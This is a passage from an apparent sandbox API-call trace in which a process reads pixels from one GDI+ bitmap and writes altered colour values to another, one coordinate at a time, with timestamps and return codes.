(image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.205] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.205] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.205] GdipBitmapSetPixel (bitmap=0x5d1b670, x=11, y=0, color=0x67171b66) returned 0x0 [0272.205] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.205] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.205] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=12, y=0, color=0x18e3e0) returned 0x0 [0272.205] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.205] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.294] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.294] GdipBitmapSetPixel (bitmap=0x5d1b670, x=12, y=0, color=0x45217878) returned 0x0 [0272.294] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.294] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.294] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=13, y=0, color=0x18e3e0) returned 0x0 [0272.294] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.294] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.294] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.294] GdipBitmapSetPixel (bitmap=0x5d1b670, x=13, y=0, color=0x19787823) returned 0x0 [0272.294] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.294] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.294] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=14, y=0, color=0x18e3e0) returned 0x0 [0272.294] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.295] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.295] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.295] GdipBitmapSetPixel (bitmap=0x5d1b670, x=14, y=0, color=0x6978196b) returned 0x0 [0272.295] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.295] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.295] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=15, y=0, color=0x18e3e0) returned 0x0 [0272.295] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.295] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.295] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.295] GdipBitmapSetPixel (bitmap=0x5d1b670, x=15, y=0, color=0xb1f7878) returned 0x0 [0272.295] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.295] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.295] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=16, y=0, color=0x18e3e0) returned 0x0 [0272.295] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.295] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.295] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.296] GdipBitmapSetPixel (bitmap=0x5d1b670, x=16, y=0, color=0xf1507819) returned 0x0 [0272.296] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.296] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.296] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=17, y=0, color=0x18e3e0) returned 0x0 [0272.296] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.296] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.296] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.296] GdipBitmapSetPixel (bitmap=0x5d1b670, x=17, y=0, color=0x7a7c1978) returned 0x0 [0272.296] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.296] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.296] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=18, y=0, color=0x18e3e0) returned 0x0 [0272.296] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.296] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.296] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.296] GdipBitmapSetPixel (bitmap=0x5d1b670, x=18, y=0, color=0x55397c78) returned 0x0 [0272.296] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.296] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.297] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=19, y=0, color=0x18e3e0) returned 0x0 [0272.297] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.297] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.297] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.297] GdipBitmapSetPixel (bitmap=0x5d1b670, x=19, y=0, color=0x33727819) returned 0x0 [0272.297] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.297] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.297] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=20, y=0, color=0x18e3e0) returned 0x0 [0272.297] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.297] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.297] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.297] GdipBitmapSetPixel (bitmap=0x5d1b670, x=20, y=0, color=0x7878e687) returned 0x0 [0272.297] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.297] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.297] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=21, y=0, color=0x18e3e0) returned 0x0 [0272.297] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.297] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.298] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.298] GdipBitmapSetPixel (bitmap=0x5d1b670, x=21, y=0, color=0x7f5c7872) returned 0x0 [0272.298] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.298] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.298] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=22, y=0, color=0x18e3e0) returned 0x0 [0272.298] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.298] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.298] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.298] GdipBitmapSetPixel (bitmap=0x5d1b670, x=22, y=0, color=0xe6830521) returned 0x0 [0272.298] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.298] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.298] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=23, y=0, color=0x18e3e0) returned 0x0 [0272.298] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.298] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.298] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.298] GdipBitmapSetPixel (bitmap=0x5d1b670, x=23, y=0, color=0x5c786108) returned 0x0 [0272.298] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.299] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.299] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=24, y=0, color=0x18e3e0) returned 0x0 [0272.299] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.299] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.299] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.299] GdipBitmapSetPixel (bitmap=0x5d1b670, x=24, y=0, color=0x78720687) returned 0x0 [0272.299] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.299] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.299] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=25, y=0, color=0x18e3e0) returned 0x0 [0272.299] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.299] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.744] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.744] GdipBitmapSetPixel (bitmap=0x5d1b670, x=25, y=0, color=0x1a785219) returned 0x0 [0272.744] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.744] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.744] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=26, y=0, color=0x18e3e0) returned 0x0 [0272.744] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.744] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.744] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.744] GdipBitmapSetPixel (bitmap=0x5d1b670, x=26, y=0, color=0x786b2178) returned 0x0 [0272.744] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.744] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.744] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=27, y=0, color=0x18e3e0) returned 0x0 [0272.744] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.744] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.744] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.744] GdipBitmapSetPixel (bitmap=0x5d1b670, x=27, y=0, color=0x78182c50) returned 0x0 [0272.745] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.745] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.745] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=28, y=0, color=0x18e3e0) returned 0x0 [0272.745] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.745] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.745] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.745] GdipBitmapSetPixel (bitmap=0x5d1b670, x=28, y=0, color=0x1b234019) returned 0x0 [0272.745] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.745] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.745] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=29, y=0, color=0x18e3e0) returned 0x0 [0272.745] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.745] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.745] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.745] GdipBitmapSetPixel (bitmap=0x5d1b670, x=29, y=0, color=0x3b401978) returned 0x0 [0272.745] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.745] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.745] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=30, y=0, color=0x18e3e0) returned 0x0 [0272.746] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.746] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.746] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.746] GdipBitmapSetPixel (bitmap=0x5d1b670, x=30, y=0, color=0x78198787) returned 0x0 [0272.746] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.746] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.746] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=31, y=0, color=0x18e3e0) returned 0x0 [0272.746] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.746] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.746] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.746] GdipBitmapSetPixel (bitmap=0x5d1b670, x=31, y=0, color=0x1b247819) returned 0x0 [0272.746] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.746] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.746] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=32, y=0, color=0x18e3e0) returned 0x0 [0272.746] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.746] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.746] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.747] GdipBitmapSetPixel (bitmap=0x5d1b670, x=32, y=0, color=0x44401978) returned 0x0 [0272.747] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.747] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.747] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=33, y=0, color=0x18e3e0) returned 0x0 [0272.747] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.747] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.747] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.747] GdipBitmapSetPixel (bitmap=0x5d1b670, x=33, y=0, color=0x50197878) returned 0x0 [0272.747] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.747] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.747] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=34, y=0, color=0x18e3e0) returned 0x0 [0272.747] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.747] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.747] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.747] GdipBitmapSetPixel (bitmap=0x5d1b670, x=34, y=0, color=0x194c401f) returned 0x0 [0272.747] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.747] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.747] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=35, y=0, color=0x18e3e0) returned 0x0 [0272.748] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.748] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.748] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.748] GdipBitmapSetPixel (bitmap=0x5d1b670, x=35, y=0, color=0x78781952) returned 0x0 [0272.748] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.748] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.748] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=36, y=0, color=0x18e3e0) returned 0x0 [0272.748] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.748] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.748] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.748] GdipBitmapSetPixel (bitmap=0x5d1b670, x=36, y=0, color=0x87e68742) returned 0x0 [0272.748] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.748] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.748] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=37, y=0, color=0x18e3e0) returned 0x0 [0272.748] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.748] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.748] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.748] GdipBitmapSetPixel (bitmap=0x5d1b670, x=37, y=0, color=0x1d6b6d19) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.749] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.749] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=38, y=0, color=0x18e3e0) returned 0x0 [0272.749] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.749] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.749] GdipBitmapSetPixel (bitmap=0x5d1b670, x=38, y=0, color=0x7878c5f8) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.749] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.749] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=39, y=0, color=0x18e3e0) returned 0x0 [0272.749] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.749] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.749] GdipBitmapSetPixel (bitmap=0x5d1b670, x=39, y=0, color=0x93627a78) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.749] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.749] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=40, y=0, color=0x18e3e0) returned 0x0 [0272.749] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.749] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.749] GdipBitmapSetPixel (bitmap=0x5d1b670, x=40, y=0, color=0x1978401d) returned 0x0 [0272.749] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.750] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.750] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=41, y=0, color=0x18e3e0) returned 0x0 [0272.750] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.750] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.750] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.750] GdipBitmapSetPixel (bitmap=0x5d1b670, x=41, y=0, color=0x7a87e687) returned 0x0 [0272.750] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.750] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.750] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=42, y=0, color=0x18e3e0) returned 0x0 [0272.750] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.750] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.750] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.750] GdipBitmapSetPixel (bitmap=0x5d1b670, x=42, y=0, color=0x78197858) returned 0x0 [0272.750] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.750] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.750] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=43, y=0, color=0x18e3e0) returned 0x0 [0272.750] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.750] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.750] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.750] GdipBitmapSetPixel (bitmap=0x5d1b670, x=43, y=0, color=0x196a4013) returned 0x0 [0272.750] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.751] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.751] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=44, y=0, color=0x18e3e0) returned 0x0 [0272.751] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.751] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.751] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.751] GdipBitmapSetPixel (bitmap=0x5d1b670, x=44, y=0, color=0x7a7c1979) returned 0x0 [0272.751] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.751] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.751] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=45, y=0, color=0x18e3e0) returned 0x0 [0272.751] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.751] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.751] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.751] GdipBitmapSetPixel (bitmap=0x5d1b670, x=45, y=0, color=0x74627a78) returned 0x0 [0272.751] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.751] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.751] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=46, y=0, color=0x18e3e0) returned 0x0 [0272.751] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.751] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.751] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.751] GdipBitmapSetPixel (bitmap=0x5d1b670, x=46, y=0, color=0x8787810) returned 0x0 [0272.751] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.752] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.752] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=47, y=0, color=0x18e3e0) returned 0x0 [0272.752] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.752] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.752] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.752] GdipBitmapSetPixel (bitmap=0x5d1b670, x=47, y=0, color=0x7a78e687) returned 0x0 [0272.752] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.752] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.752] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=48, y=0, color=0x18e3e0) returned 0x0 [0272.752] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.752] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.752] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.752] GdipBitmapSetPixel (bitmap=0x5d1b670, x=48, y=0, color=0x3a237e78) returned 0x0 [0272.752] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.752] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.752] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=49, y=0, color=0x18e3e0) returned 0x0 [0272.881] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.881] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.881] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.881] GdipBitmapSetPixel (bitmap=0x5d1b670, x=49, y=0, color=0x19787819) returned 0x0 [0272.881] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.882] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.882] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=50, y=0, color=0x18e3e0) returned 0x0 [0272.882] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.882] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.882] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.882] GdipBitmapSetPixel (bitmap=0x5d1b670, x=50, y=0, color=0x78782178) returned 0x0 [0272.882] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.882] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.882] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=51, y=0, color=0x18e3e0) returned 0x0 [0272.882] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.882] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.882] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.882] GdipBitmapSetPixel (bitmap=0x5d1b670, x=51, y=0, color=0x31b5378) returned 0x0 [0272.882] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.882] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.882] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=52, y=0, color=0x18e3e0) returned 0x0 [0272.882] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.882] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.882] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.882] GdipBitmapSetPixel (bitmap=0x5d1b670, x=52, y=0, color=0x217e781b) returned 0x0 [0272.883] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.883] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.883] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=53, y=0, color=0x18e3e0) returned 0x0 [0272.883] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.883] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.883] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.883] GdipBitmapSetPixel (bitmap=0x5d1b670, x=53, y=0, color=0x587e197a) returned 0x0 [0272.883] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.883] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.883] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=54, y=0, color=0x18e3e0) returned 0x0 [0272.883] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.883] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.883] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.883] GdipBitmapSetPixel (bitmap=0x5d1b670, x=54, y=0, color=0x231ad72f) returned 0x0 [0272.883] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.883] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.883] GdipBitmapGetPixel 